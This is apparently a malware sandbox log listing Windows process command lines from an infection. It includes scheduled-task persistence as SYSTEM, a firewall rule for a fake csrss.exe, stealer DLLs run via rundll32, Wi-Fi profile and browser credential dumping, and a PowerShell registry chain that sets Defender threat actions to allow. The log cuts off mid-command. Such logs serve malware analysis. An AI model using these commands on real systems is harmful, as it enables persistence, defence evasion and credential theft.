C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bNEqRyuTSpchqwHoUe" /SC once /ST 11:18:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\lTcZMbelPItKiDkvR\AMOCiTieYDbkqZL\qGOewyT.exe\" Lw /yBsite_idjQg 525403 /S" /V1 /F
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5880 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\NUBt5bjQBHBEXHTeO9IT.exe
"C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\NUBt5bjQBHBEXHTeO9IT.exe"
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\2169.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\2169.dll
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff274e9758,0x7fff274e9768,0x7fff274e9778
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff274e9758,0x7fff274e9768,0x7fff274e9778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.facebook.com/video
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff274e9758,0x7fff274e9768,0x7fff274e9778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fff274e9758,0x7fff274e9768,0x7fff274e9778
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.facebook.com/video
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" https://accounts.google.com
C:\Users\Admin\AppData\Local\Temp\2E6A.exe
C:\Users\Admin\AppData\Local\Temp\2E6A.exe
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7600.0.816648984\1229329128" -parentBuildID 20221007134813 -prefsHandle 1776 -prefMapHandle 1768 -prefsLen 20747 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {de6af4b3-0f30-4d05-a8a6-398ba077481d} 7600 "\\.\pipe\gecko-crash-server-pipe.7600" 1872 1eccdad9858 gpu
C:\Users\Admin\AppData\Local\Temp\2E6A.exe
C:\Users\Admin\AppData\Local\Temp\2E6A.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1884 --field-trial-handle=1980,i,5393602021566285528,674770183575587431,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1596 --field-trial-handle=1980,i,5393602021566285528,674770183575587431,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1860 --field-trial-handle=1972,i,14837426883159466390,2584554103553490410,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1584 --field-trial-handle=1972,i,14837426883159466390,2584554103553490410,131072 /prefetch:2
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7600.1.100499619\1512152703" -parentBuildID 20221007134813 -prefsHandle 2316 -prefMapHandle 2312 -prefsLen 21563 -prefMapSize 233444 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {791be4ad-8b5f-4c44-875e-30be8b4efcdc} 7600 "\\.\pipe\gecko-crash-server-pipe.7600" 2344 1ecba96ec58 socket
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1924 --field-trial-handle=1988,i,7628991552639747461,11736674585833950061,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1700 --field-trial-handle=1988,i,7628991552639747461,11736674585833950061,131072 /prefetch:2
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1736 --field-trial-handle=1988,i,12937134176447365376,10907551089122924849,131072 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\1000486001\new.exe
"C:\Users\Admin\AppData\Local\Temp\1000486001\new.exe"
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7600.2.1547528953\636298821" -childID 1 -isForBrowser -prefsHandle 3220 -prefMapHandle 3216 -prefsLen 21666 -prefMapSize 233444 -jsInitHandle 1016 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d9ba1fe5-1dd2-4672-b9a9-20478fe1c3e4} 7600 "\\.\pipe\gecko-crash-server-pipe.7600" 3232 1ecd10fa258 tab
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1928 --field-trial-handle=1988,i,12937134176447365376,10907551089122924849,131072 /prefetch:8
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7600.3.1969698435\1018718059" -childID 2 -isForBrowser -prefsHandle 3732 -prefMapHandle 3728 -prefsLen 26064 -prefMapSize 233444 -jsInitHandle 1016 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {79e79581-9b55-4773-b976-6d64c5b3527f} 7600 "\\.\pipe\gecko-crash-server-pipe.7600" 3744 1ecba965758 tab
C:\Users\Admin\AppData\Local\Temp\1000524001\well.exe
"C:\Users\Admin\AppData\Local\Temp\1000524001\well.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5560 -ip 5560
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7600.4.933373074\1363617100" -childID 3 -isForBrowser -prefsHandle 4724 -prefMapHandle 4740 -prefsLen 26204 -prefMapSize 233444 -jsInitHandle 1016 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {a832ce82-7b88-45e7-995d-569537c986fb} 7600 "\\.\pipe\gecko-crash-server-pipe.7600" 4748 1ecd4d03b58 tab
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5560 -s 2552
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7600.5.1276821792\559998068" -childID 4 -isForBrowser -prefsHandle 4988 -prefMapHandle 4984 -prefsLen 26204 -prefMapSize 233444 -jsInitHandle 1016 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {2ecd6b64-6529-4469-94bb-5bbbd29c3ff6} 7600 "\\.\pipe\gecko-crash-server-pipe.7600" 5000 1ecd57e1858 tab
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" https://accounts.google.com
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff274e9758,0x7fff274e9768,0x7fff274e9778
C:\Users\Admin\AppData\Local\Temp\1000538001\1800.exe
"C:\Users\Admin\AppData\Local\Temp\1000538001\1800.exe"
C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\8SH5s1nDkPaUw3uGkt19.exe
"C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\8SH5s1nDkPaUw3uGkt19.exe"
C:\ProgramData\viewer\viewer.exe
"C:\ProgramData\viewer\viewer.exe"
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe"
C:\Windows\system32\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
C:\Users\Admin\AppData\Local\Temp\578E.exe
C:\Users\Admin\AppData\Local\Temp\578E.exe
C:\Windows\system32\netsh.exe
netsh wlan show profiles
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll, Main
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=3868 --field-trial-handle=2304,i,12549764354064357087,10619415398646561355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
C:\Users\Admin\AppData\Local\Temp\1000548001\ladas.exe
"C:\Users\Admin\AppData\Local\Temp\1000548001\ladas.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\o9v3GsJlKEHk0oMJOOrA.exe
"C:\Users\Admin\AppData\Local\Temp\heidibWUFyqm4oORd\o9v3GsJlKEHk0oMJOOrA.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3048 --field-trial-handle=2304,i,12549764354064357087,10619415398646561355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3040 --field-trial-handle=2304,i,12549764354064357087,10619415398646561355,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1880 --field-trial-handle=2304,i,12549764354064357087,10619415398646561355,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1848 --field-trial-handle=2304,i,12549764354064357087,10619415398646561355,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1636 --field-trial-handle=2304,i,12549764354064357087,10619415398646561355,131072 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\6933.exe
C:\Users\Admin\AppData\Local\Temp\6933.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Compress-Archive -Path 'C:\Users\Admin\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\Admin\AppData\Local\Temp\002246581151_Desktop.zip' -CompressionLevel Optimal
C:\Users\Admin\AppData\Local\Temp\1000549001\dota.exe
"C:\Users\Admin\AppData\Local\Temp\1000549001\dota.exe"
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
C:\Users\Admin\AppData\Local\Temp\1000552001\lolololoMRK123.exe
"C:\Users\Admin\AppData\Local\Temp\1000552001\lolololoMRK123.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe" /stext "C:\Users\Admin\AppData\Local\Temp\mbegagybvjv"
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe" /stext "C:\Users\Admin\AppData\Local\Temp\wwjqtyjvqrnspz"
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe" /stext "C:\Users\Admin\AppData\Local\Temp\zywjtjtwezfxafkvtp"
C:\Users\Admin\AppData\Local\Temp\1000553001\987123.exe
"C:\Users\Admin\AppData\Local\Temp\1000553001\987123.exe"
\??\c:\program files (x86)\internet explorer\iexplore.exe
"c:\program files (x86)\internet explorer\iexplore.exe" /stext "C:\Users\Admin\AppData\Local\Temp\mbegagybvjv"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5520 -ip 5520
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5520 -s 380
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x00000000000004D4 0x00000000000004E8
C:\Users\Admin\AppData\Local\Temp\A766.exe
C:\Users\Admin\AppData\Local\Temp\A766.exe
C:\Users\Admin\AppData\Local\Temp\1000554001\lumma123142124.exe
"C:\Users\Admin\AppData\Local\Temp\1000554001\lumma123142124.exe"
C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
"C:\Users\Admin\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
C:\Users\Admin\AppData\Local\Temp\1000557001\daisy123.exe
"C:\Users\Admin\AppData\Local\Temp\1000557001\daisy123.exe"
C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup4.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 8792 -s 1108
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 380 -p 8792 -ip 8792
C:\Users\Admin\AppData\Local\Temp\FourthX.exe
"C:\Users\Admin\AppData\Local\Temp\FourthX.exe"
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
C:\Windows\SysWOW64\chcp.com
chcp 1251
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
C:\Users\Admin\AppData\Local\Temp\nsyC944.tmp
C:\Users\Admin\AppData\Local\Temp\nsyC944.tmp
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1904,755633200533299131,661703125149569495,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=4532 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\D8F6.exe
C:\Users\Admin\AppData\Local\Temp\D8F6.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 400 -p 7376 -ip 7376
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7376 -s 380
C:\Users\Admin\AppData\Local\Temp\E2BB.exe
C:\Users\Admin\AppData\Local\Temp\E2BB.exe
C:\Users\Admin\AppData\Local\Temp\is-VGI97.tmp\E2BB.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VGI97.tmp\E2BB.tmp" /SL5="$303F4,4074059,54272,C:\Users\Admin\AppData\Local\Temp\E2BB.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 7372 -ip 7372
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 7372 -ip 7372
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7372 -s 1176
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7372 -s 1140
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 7372 -ip 7372
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 7372 -s 1196
C:\Users\Admin\AppData\Local\Temp\48C.exe
C:\Users\Admin\AppData\Local\Temp\48C.exe
C:\Users\Admin\AppData\Local\Temp\is-THKQ9.tmp\48C.tmp
"C:\Users\Admin\AppData\Local\Temp\is-THKQ9.tmp\48C.tmp" /SL5="$20460,4502673,54272,C:\Users\Admin\AppData\Local\Temp\48C.exe"
C:\Users\Admin\AppData\Local\Temp\lTcZMbelPItKiDkvR\AMOCiTieYDbkqZL\qGOewyT.exe
C:\Users\Admin\AppData\Local\Temp\lTcZMbelPItKiDkvR\AMOCiTieYDbkqZL\qGOewyT.exe Lw /yBsite_idjQg 525403 /S
C:\Users\Admin\AppData\Local\CD-ROM Emulator\cdromemulator.exe
"C:\Users\Admin\AppData\Local\CD-ROM Emulator\cdromemulator.exe" -i
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG 